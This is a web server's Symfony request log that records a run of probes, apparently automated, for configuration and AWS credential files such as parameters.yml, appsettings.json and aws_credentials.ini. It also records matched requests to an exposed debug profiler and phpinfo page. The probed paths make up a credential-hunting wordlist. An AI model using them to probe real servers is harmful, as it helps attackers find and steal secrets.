[2025-12-20 20:05:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/config/development.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/config/development.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:05:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/config/parameters.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/config/parameters.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:05:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/config/parameters.yml.dist"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/config/parameters.yml.dist\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:05:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/models/post.rb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/models/post.rb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:05:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/sign.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/sign.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:05:26] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/app_dev.php/_profiler/phpinfo","method":"GET"} []
[2025-12-20 20:05:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:07:01] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 20:07:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application/configs/application.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application/configs/application.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:07:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application/libraries/aws-config.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application/libraries/aws-config.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:07:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application/libraries/aws/access.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application/libraries/aws/access.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:07:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appsettings.Development.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appsettings.Development.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:07:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appsettings.Production.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appsettings.Production.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:07:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appsettings.QA.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appsettings.QA.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:07:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appsettings.Staging.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appsettings.Staging.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:08:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appsettings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appsettings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:08:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appveyor.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appveyor.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:08:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-example.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-example.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:08:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-lambda.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-lambda.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:08:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-notifications.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-notifications.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:08:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-nuke.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-nuke.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:08:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"12ae6e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/12ae6e","method":"GET"} []
[2025-12-20 20:08:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 20:08:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-s3.service.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-s3.service.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:08:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-s3.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-s3.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:08:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-wrapper.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-wrapper.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:09:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.config.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.config.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:09:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.ino"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.ino\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:09:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:09:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:09:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.service.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.service.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:09:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.show.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.show.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:09:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:09:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws/access.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws/access.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:09:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws/index.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws/index.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:09:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws/s3.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws/s3.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:09:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws/s3.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws/s3.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:10:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /awsKEY.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /awsKEY.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:10:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /awsS3.util.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /awsS3.util.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:10:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws_config.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws_config.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:10:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws_cred.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws_cred.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws_credentials.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws_credentials.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:10:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws_ec2.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws_ec2.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:10:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /awsconfig.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /awsconfig.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:11:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/config/default.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/config/default.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:11:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/config/development.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/config/development.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
